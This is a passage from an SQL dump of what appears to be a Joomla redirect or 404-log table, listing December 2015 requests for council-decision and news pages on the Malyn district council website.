00:00:00',301),(22214,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=749:2012-08-24-05-59-17&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-22 03:54:48','0000-00-00 00:00:00',301),(22215,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=748:2012-08-12-17-56-55&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-22 04:15:04','0000-00-00 00:00:00',301),(22216,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1337:2014-06-10-11-11-42&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 04:16:54','0000-00-00 00:00:00',301),(22217,'http://www.malyn-rayrada.org.ua/index.php?id=50:--23042013-&Itemid=90&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2015-12-22 04:28:59','0000-00-00 00:00:00',301),(22218,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1142:-l-r-&Itemid=95&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-22 04:29:04','0000-00-00 00:00:00',301),(22219,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1199:-l-r-&Itemid=97&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 04:29:09','0000-00-00 00:00:00',301),(22220,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=680:2012-05-17-10-02-41&Itemid=80&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 04:29:13','0000-00-00 00:00:00',301),(22221,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1063:2013-08-02-17-32-04&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-22 04:29:18','0000-00-00 00:00:00',301),(22222,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=734:-6-2012-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 04:29:27','0000-00-00 00:00:00',301),(22223,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1056:-22-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 04:29:36','0000-00-00 00:00:00',301),(22224,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 04:29:47','0000-00-00 00:00:00',301),(22225,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=822:----------2012--2013-----------------l-r&Itemid=84&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 04:29:56','0000-00-00 00:00:00',301),(22226,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 04:30:01','0000-00-00 00:00:00',301),(22227,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=200:-----------------2006-2010-&Itemid=60&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 04:30:10','0000-00-00 00:00:00',301),(22228,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=843:-l-r&Itemid=85&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 04:30:19','0000-00-00 00:00:00',301),(22229,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1095:2013-09-24-13-25-55&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 04:30:24','0000-00-00 00:00:00',301),(22230,'http://www.malyn-rayrada.org.ua/index.php?id=38:--19122011-&Itemid=73&lang=ru&layout=blog&limitstart=30&option=com_content&view=category','','','',1,0,'2015-12-22 04:30:33','0000-00-00 00:00:00',301),(22231,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=620:2012-03-29-10-03-40&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 04:30:38','0000-00-00 00:00:00',301),(22232,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1098:2013-09-25-09-34-57&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 04:31:01','0000-00-00 00:00:00',301),(22233,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=742:-14-&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 04:31:20','0000-00-00 00:00:00',301),(22234,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1058:-2013-&Itemid=92&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 04:31:29','0000-00-00 00:00:00',301),(22235,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1043:-2013-&Itemid=92&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 04:31:33','0000-00-00 00:00:00',301),(22236,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=416:2011-09-29-06-48-53&Itemid=72&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 04:31:43','0000-00-00 00:00:00',301),(22237,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=582:2012-02-27-13-18-37&Itemid=77&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 04:31:47','0000-00-00 00:00:00',301),(22238,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 04:31:52','0000-00-00 00:00:00',301),(22239,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1144:--------lr&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 04:32:02','0000-00-00 00:00:00',301),(22240,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1328:2014-06-01-11-58-56&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 06:53:03','0000-00-00 00:00:00',301),(22241,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=749:2012-08-24-05-59-17&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 06:53:07','0000-00-00 00:00:00',301),(22242,'http://malyn-rayrada.org.ua/attachments/article/1122/Тиднюк.pdf','','','',5,0,'2015-12-22 11:12:56','0000-00-00 00:00:00',301),(22243,'http://malyn-rayrada.org.ua/index.php/1126-viddil-statistiki-u-malinskomu-rajoni-informue-pro-cotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-traven-2015-roku?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-22 15:12:05','0000-00-00 00:00:00',301),(22244,'http://malyn-rayrada.org.ua/index.php/1131-granitnenska-selishchna-rada-informue','','','',7,0,'2015-12-22 15:12:21','0000-00-00 00:00:00',301),(22245,'http://malyn-rayrada.org.ua/index.php/1131-granitnenska-selishchna-rada-informue?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:12:23','0000-00-00 00:00:00',301),(22246,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-','','','',6,0,'2015-12-22 15:15:23','0000-00-00 00:00:00',301),(22247,'http://malyn-rayrada.org.ua/index.php/3-vitannja-iz-svitlim-hristovim-voskresinnjam?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:17:16','0000-00-00 00:00:00',301),(22248,'http://malyn-rayrada.org.ua/index.php/52-vitaemo-iz-pershim-dnem-vesni?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:18:08','0000-00-00 00:00:00',301),(22249,'http://malyn-rayrada.org.ua/index.php/567-ogoloshennja_4?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:18:33','0000-00-00 00:00:00',301),(22250,'http://malyn-rayrada.org.ua/index.php/568-ogoloshennja_5','','','',3,0,'2015-12-22 15:18:39','0000-00-00 00:00:00',301),(22251,'http://malyn-rayrada.org.ua/index.php/664-ogoloshennja_11?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:19:52','0000-00-00 00:00:00',301),(22252,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1109-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnikh-dilyanok-yaki-nadayutsya-v-orendu-gr-yakimenko-n-m','','','',3,0,'2015-12-22 15:23:36','0000-00-00 00:00:00',301),(22253,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1110-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',3,0,'2015-12-22 15:23:42','0000-00-00 00:00:00',301),(22254,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1110-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:23:51','0000-00-00 00:00:00',301),(22255,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1111-pro-informatsiyu-prokuraturi-malinskogo-rajonu-pro-stan-zakonnosti-zakhodi-shchodo-jiji-zmitsnennya-ta-rezultati-diyalnosti-na-teritoriji-rajonu','','','',3,0,'2015-12-22 15:23:54','0000-00-00 00:00:00',301),(22256,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/980-pro-vikonannya-planu-roboti-rajonnoji-radi-za-2014-rik-ta-plan-roboti-rajonnoji-radi-na-i-pivrichchya-2015-roku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:26:47','0000-00-00 00:00:00',301),(22257,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/981-pro-zatverdzhennya-programi-rozvitku-malogo-i-serednogo-pidpriemnitstva-malinskogo-rajonu-na-2015-2016-roki?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:27:03','0000-00-00 00:00:00',301),(22258,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/982-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2015-rik','','','',4,0,'2015-12-22 15:27:07','0000-00-00 00:00:00',301),(22259,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/982-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:27:11','0000-00-00 00:00:00',301),(22260,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/983-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:27:25','0000-00-00 00:00:00',301),(22261,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/985-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:27:45','0000-00-00 00:00:00',301),(22262,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/381-pro-peredachu-neruhomogo-majna-shho-perebuvae-u_2','','','',3,0,'2015-12-22 15:28:58','0000-00-00 00:00:00',301),(22263,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=20','','','',5,0,'2015-12-22 15:29:26','0000-00-00 00:00:00',301),(22264,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/744-p','','','',3,0,'2015-12-22 15:30:00','0000-00-00 00:00:00',301),(22265,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/163-pro-normativnu-groshovu-ocinku-zemel-naselenih?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:30:11','0000-00-00 00:00:00',301),(22266,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/596-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:32:43','0000-00-00 00:00:00',301),(22267,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/599-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_11','','','',4,0,'2015-12-22 15:33:03','0000-00-00 00:00:00',301),(22268,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/213-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_7?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:35:59','0000-00-00 00:00:00',301),(22269,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/322-pro-zatverdzhennja-kompleksnoi-programi-protidii?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 15:36:04','0000-00-00 00:00:00',301),(22270,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/258-pro-zatverdzhennja-rolse','','','',3,0,'2015-12-22 15:36:50','0000-00-00 00:00:00',301),(22271,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:39:58','0000-00-00 00:00:00',301),(22272,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-22 15:42:43','0000-00-00 00:00:00',301),(22273,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=ru&Itemid=','','','',3,0,'2015-12-22 15:42:48','0000-00-00 00:00:00',301),(22274,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:42:56','0000-00-00 00:00:00',301),(22275,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2015-12-22 15:44:13','0000-00-00 00:00:00',301),(22276,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2015-12-22 15:44:18','0000-00-00 00:00:00',301),(22277,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=430:14-&catid=11&lang=en','','','',3,0,'2015-12-22 15:44:20','0000-00-00 00:00:00',301),(22278,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=430:14-&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-22 15:44:22','0000-00-00 00:00:00',301),(22279,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=430:14-&catid=11&lang=ru','','','',3,0,'2015-12-22 15:44:24','0000-00-00 00:00:00',301),(22280,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=430:14-&catid=11&lang=ru&Itemid=','','','',3,0,'2015-12-22 15:44:27','0000-00-00 00:00:00',301),(22281,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=430:14-&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:44:30','0000-00-00 00:00:00',301),(22282,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=449:2011-10-28-08-04-47&catid=38&Itemid=73&lang=en','','','',3,0,'2015-12-22 15:44:35','0000-00-00 00:00:00',301),(22283,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=449:2011-10-28-08-04-47&catid=38&Itemid=73&lang=ru','','','',3,0,'2015-12-22 15:44:37','0000-00-00 00:00:00',301),(22284,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=449:2011-10-28-08-04-47&catid=38&Itemid=73&lang=uk','','','',3,0,'2015-12-22 15:44:40','0000-00-00 00:00:00',301),(22285,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=507:2011-12-19-17-10-52&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-12-22 15:45:23','0000-00-00 00:00:00',301),(22286,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=507:2011-12-19-17-10-52&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-12-22 15:45:26','0000-00-00 00:00:00',301),(22287,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=514:2011-12-22-10-03-07&catid=38:--19122011-&Itemid=73&lang=uk','','','',3,0,'2015-12-22 15:45:41','0000-00-00 00:00:00',301),(22288,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-12-22 15:45:45','0000-00-00 00:00:00',301),(22289,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-22 15:45:46','0000-00-00 00:00:00',301),(22290,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=620:2012-03-29-10-03-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-12-22 15:45:48','0000-00-00 00:00:00',301),(22291,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=620:2012-03-29-10-03-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-12-22 15:45:52','0000-00-00 00:00:00',301),(22292,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:45:55','0000-00-00 00:00:00',301),(22293,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=631:-i-2012-&catid=42:--16052012-&Itemid=80&lang=uk','','','',3,0,'2015-12-22 15:45:55','0000-00-00 00:00:00',301),(22294,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=632:-2011-2015-&catid=42&Itemid=80&lang=en','','','',3,0,'2015-12-22 15:45:59','0000-00-00 00:00:00',301),(22295,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-22 15:45:59','0000-00-00 00:00:00',301),(22296,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=632:-2011-2015-&catid=42&Itemid=80&lang=ru','','','',3,0,'2015-12-22 15:46:02','0000-00-00 00:00:00',301),(22297,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=636:-2011-2015-&catid=42&Itemid=80&lang=ru','','','',3,0,'2015-12-22 15:46:07','0000-00-00 00:00:00',301),(22298,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:46:09','0000-00-00 00:00:00',301),(22299,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=en&Itemid=','','','',4,0,'2015-12-22 15:46:21','0000-00-00 00:00:00',301),(22300,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=637:2012-04-03-12-34-11&catid=42&Itemid=80&lang=en','','','',3,0,'2015-12-22 15:46:27','0000-00-00 00:00:00',301),(22301,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=ru&Itemid=','','','',5,0,'2015-12-22 15:46:28','0000-00-00 00:00:00',301),(22302,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=637:2012-04-03-12-34-11&catid=42&Itemid=80&lang=ru','','','',3,0,'2015-12-22 15:46:31','0000-00-00 00:00:00',301),(22303,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=uk&Itemid=','','','',5,0,'2015-12-22 15:46:32','0000-00-00 00:00:00',301),(22304,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=639:2012-04-03-12-41-18&catid=42:--16052012-&Itemid=80&lang=en','','','',3,0,'2015-12-22 15:46:33','0000-00-00 00:00:00',301),(22305,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=639:2012-04-03-12-41-18&catid=42:--16052012-&Itemid=80&lang=ru','','','',3,0,'2015-12-22 15:46:36','0000-00-00 00:00:00',301),(22306,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=643:-6-&catid=42&Itemid=80&lang=uk','','','',3,0,'2015-12-22 15:46:42','0000-00-00 00:00:00',301),(22307,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=644:2012-04-04-09-52-48&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-22 15:46:46','0000-00-00 00:00:00',301),(22308,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=644:2012-04-04-09-52-48&catid=11&lang=ru&Itemid=','','','',3,0,'2015-12-22 15:46:48','0000-00-00 00:00:00',301),(22309,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=644:2012-04-04-09-52-48&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:46:51','0000-00-00 00:00:00',301),(22310,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=742:-14-&catid=11&lang=ru','','','',3,0,'2015-12-22 15:47:05','0000-00-00 00:00:00',301),(22311,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=10:2010-06-05-15-11-20&catid=8&Itemid=13&lang=uk','','','',3,0,'2015-12-22 15:47:06','0000-00-00 00:00:00',301),(22312,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-22 15:47:07','0000-00-00 00:00:00',301),(22313,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=ru&Itemid=','','','',3,0,'2015-12-22 15:47:11','0000-00-00 00:00:00',301),(22314,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=10:2010-06-05-15-11-20&catid=8:2010-06-05-12-54-02&Itemid=13&lang=en','','','',3,0,'2015-12-22 15:47:14','0000-00-00 00:00:00',301),(22315,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:47:15','0000-00-00 00:00:00',301),(22316,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=142:2010-10-15-06-19-49&catid=27:---1932-33-&Itemid=58&lang=en','','','',3,0,'2015-12-22 15:47:20','0000-00-00 00:00:00',301),(22317,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=142:2010-10-15-06-19-49&catid=27:---1932-33-&Itemid=58&lang=ru','','','',3,0,'2015-12-22 15:47:25','0000-00-00 00:00:00',301),(22318,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=en','','','',3,0,'2015-12-22 15:47:29','0000-00-00 00:00:00',301),(22319,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=ru','','','',3,0,'2015-12-22 15:47:31','0000-00-00 00:00:00',301),(22320,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=ru&Itemid=','','','',3,0,'2015-12-22 15:47:33','0000-00-00 00:00:00',301),(22321,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:47:35','0000-00-00 00:00:00',301),(22322,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:47:37','0000-00-00 00:00:00',301),(22323,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11&lang=ru','','','',3,0,'2015-12-22 15:47:40','0000-00-00 00:00:00',301),(22324,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-12-22 15:47:43','0000-00-00 00:00:00',301),(22325,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11&lang=uk&Itemid=0','','','',3,0,'2015-12-22 15:47:46','0000-00-00 00:00:00',301),(22326,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-12-22 15:47:49','0000-00-00 00:00:00',301),(22327,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-12-22 15:47:51','0000-00-00 00:00:00',301),(22328,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-12-22 15:48:00','0000-00-00 00:00:00',301),(22329,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=767:2012-10-01-08-20-30&catid=11&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:48:03','0000-00-00 00:00:00',301),(22330,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=767:2012-10-01-08-20-30&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-12-22 15:48:05','0000-00-00 00:00:00',301),(22331,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=767:2012-10-01-08-20-30&catid=11&lang=uk&Itemid=0','','','',3,0,'2015-12-22 15:48:08','0000-00-00 00:00:00',301),(22332,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:48:14','0000-00-00 00:00:00',301),(22333,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-12-22 15:48:18','0000-00-00 00:00:00',301),(22334,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=uk&Itemid=0','','','',3,0,'2015-12-22 15:48:20','0000-00-00 00:00:00',301),(22335,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11&lang=en','','','',3,0,'2015-12-22 15:48:22','0000-00-00 00:00:00',301),(22336,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-22 15:48:24','0000-00-00 00:00:00',301),(22337,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11&lang=ru','','','',3,0,'2015-12-22 15:48:30','0000-00-00 00:00:00',301),(22338,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11&lang=ru&Itemid=','','','',3,0,'2015-12-22 15:48:33','0000-00-00 00:00:00',301),(22339,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:48:40','0000-00-00 00:00:00',301),(22340,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-22 15:48:47','0000-00-00 00:00:00',301),(22341,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-12-22 15:48:47','0000-00-00 00:00:00',301),(22342,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-12-22 15:48:51','0000-00-00 00:00:00',301),(22343,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11&lang=ru','','','',3,0,'2015-12-22 15:48:52','0000-00-00 00:00:00',301),(22344,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11&lang=ru&Itemid=','','','',3,0,'2015-12-22 15:48:58','0000-00-00 00:00:00',301),(22345,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:49:05','0000-00-00 00:00:00',301),(22346,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-22 15:49:20','0000-00-00 00:00:00',301),(22347,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=ru','','','',3,0,'2015-12-22 15:49:23','0000-00-00 00:00:00',301),(22348,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=ru&Itemid=','','','',3,0,'2015-12-22 15:49:25','0000-00-00 00:00:00',301),(22349,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=279:2011-03-31-08-20-23&catid=11&lang=en','','','',3,0,'2015-12-22 15:49:27','0000-00-00 00:00:00',301),(22350,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:49:28','0000-00-00 00:00:00',301),(22351,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=821:------12--2012--311-l------------r&catid=45&Itemid=84&lang=uk','','','',3,0,'2015-12-22 15:49:32','0000-00-00 